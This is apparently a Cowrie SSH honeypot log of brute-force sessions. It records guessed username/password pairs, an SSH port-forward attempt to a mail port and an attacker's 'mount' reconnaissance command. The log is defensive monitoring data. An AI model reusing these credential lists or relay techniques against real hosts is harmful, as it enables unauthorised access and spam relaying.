{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:12:24.709618Z","src_ip":"80.94.95.15","session":"f7cd5657e99a"}
{"eventid":"cowrie.login.success","username":"root","password":"dkagh","message":"login attempt [root/dkagh] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:12:24.997849Z","src_ip":"80.94.95.15","session":"f7cd5657e99a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T09:12:25.049929Z","session":"f7cd5657e99a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T09:12:25.101226Z","src_ip":"80.94.95.15","session":"f7cd5657e99a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:12:25.153460Z","src_ip":"80.94.95.15","session":"f7cd5657e99a"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46804,"dst_ip":"1.2.3.4","dst_port":22,"session":"607a60705438","protocol":"ssh","message":"New connection: 51.79.164.132:46804 (1.2.3.4:22) [session: 607a60705438]","sensor":"my-vps","timestamp":"2025-08-28T09:12:42.665928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:12:43.055815Z","src_ip":"51.79.164.132","session":"607a60705438"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:12:43.057139Z","src_ip":"51.79.164.132","session":"607a60705438"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T09:12:45.200739Z","src_ip":"51.79.164.132","session":"607a60705438"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:12:46.673366Z","src_ip":"51.79.164.132","session":"607a60705438"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":49918,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbfd44f6c1e9","protocol":"ssh","message":"New connection: 185.93.89.7:49918 (1.2.3.4:22) [session: fbfd44f6c1e9]","sensor":"my-vps","timestamp":"2025-08-28T09:12:46.897411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:12:46.898204Z","src_ip":"185.93.89.7","session":"fbfd44f6c1e9"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:12:46.916833Z","src_ip":"185.93.89.7","session":"fbfd44f6c1e9"}
{"eventid":"cowrie.login.failed","username":"index","password":"letmein","message":"login attempt [index/letmein] failed","sensor":"my-vps","timestamp":"2025-08-28T09:12:46.953814Z","src_ip":"185.93.89.7","session":"fbfd44f6c1e9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:12:47.980766Z","src_ip":"185.93.89.7","session":"fbfd44f6c1e9"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48954,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b9a94a9868c","protocol":"ssh","message":"New connection: 51.79.164.132:48954 (1.2.3.4:22) [session: 8b9a94a9868c]","sensor":"my-vps","timestamp":"2025-08-28T09:13:08.330238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:13:08.589538Z","src_ip":"51.79.164.132","session":"8b9a94a9868c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:13:08.590234Z","src_ip":"51.79.164.132","session":"8b9a94a9868c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:13:10.442555Z","src_ip":"51.79.164.132","session":"8b9a94a9868c"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60148,"dst_ip":"1.2.3.4","dst_port":22,"session":"11af4b18f0a7","protocol":"ssh","message":"New connection: 185.93.89.7:60148 (1.2.3.4:22) [session: 11af4b18f0a7]","sensor":"my-vps","timestamp":"2025-08-28T09:13:11.527349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:13:11.528326Z","src_ip":"185.93.89.7","session":"11af4b18f0a7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:13:11.546974Z","src_ip":"185.93.89.7","session":"11af4b18f0a7"}
{"eventid":"cowrie.login.failed","username":"index","password":"abcd1234","message":"login attempt [index/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:13:11.584225Z","src_ip":"185.93.89.7","session":"11af4b18f0a7"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:11.784456Z","src_ip":"51.79.164.132","session":"8b9a94a9868c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:12.604747Z","src_ip":"185.93.89.7","session":"11af4b18f0a7"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34690,"dst_ip":"1.2.3.4","dst_port":22,"session":"a07d3037255c","protocol":"ssh","message":"New connection: 51.79.164.132:34690 (1.2.3.4:22) [session: a07d3037255c]","sensor":"my-vps","timestamp":"2025-08-28T09:13:34.124965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:13:34.240895Z","src_ip":"51.79.164.132","session":"a07d3037255c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:13:34.528974Z","src_ip":"51.79.164.132","session":"a07d3037255c"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48534,"dst_ip":"1.2.3.4","dst_port":22,"session":"32890293da26","protocol":"ssh","message":"New connection: 185.93.89.7:48534 (1.2.3.4:22) [session: 32890293da26]","sensor":"my-vps","timestamp":"2025-08-28T09:13:35.427372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:13:35.430433Z","src_ip":"185.93.89.7","session":"32890293da26"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:13:35.449499Z","src_ip":"185.93.89.7","session":"32890293da26"}
{"eventid":"cowrie.login.failed","username":"index","password":"123321","message":"login attempt [index/123321] failed","sensor":"my-vps","timestamp":"2025-08-28T09:13:35.501908Z","src_ip":"185.93.89.7","session":"32890293da26"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-28T09:13:36.134768Z","src_ip":"51.79.164.132","session":"a07d3037255c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:36.523660Z","src_ip":"185.93.89.7","session":"32890293da26"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:37.747549Z","src_ip":"51.79.164.132","session":"a07d3037255c"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":43561,"dst_ip":"1.2.3.4","dst_port":22,"session":"11dbae0c4614","protocol":"ssh","message":"New connection: 186.225.142.90:43561 (1.2.3.4:22) [session: 11dbae0c4614]","sensor":"my-vps","timestamp":"2025-08-28T09:13:44.732617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:13:44.763697Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:13:45.149305Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.login.success","username":"root","password":"096896","message":"login attempt [root/096896] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:13:48.086377Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:13:49.823920Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T09:13:49.824636Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:50.189107Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:50.202938Z","src_ip":"186.225.142.90","session":"11dbae0c4614"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47296,"dst_ip":"1.2.3.4","dst_port":22,"session":"afef963b98df","protocol":"ssh","message":"New connection: 185.93.89.7:47296 (1.2.3.4:22) [session: afef963b98df]","sensor":"my-vps","timestamp":"2025-08-28T09:13:58.534201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:13:58.543673Z","src_ip":"185.93.89.7","session":"afef963b98df"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:13:58.568660Z","src_ip":"185.93.89.7","session":"afef963b98df"}
{"eventid":"cowrie.login.failed","username":"index","password":"starwars","message":"login attempt [index/starwars] failed","sensor":"my-vps","timestamp":"2025-08-28T09:13:58.606291Z","src_ip":"185.93.89.7","session":"afef963b98df"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:13:59.629968Z","src_ip":"185.93.89.7","session":"afef963b98df"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56262,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fb1cf164d6c","protocol":"ssh","message":"New connection: 51.79.164.132:56262 (1.2.3.4:22) [session: 4fb1cf164d6c]","sensor":"my-vps","timestamp":"2025-08-28T09:14:00.567955Z"}
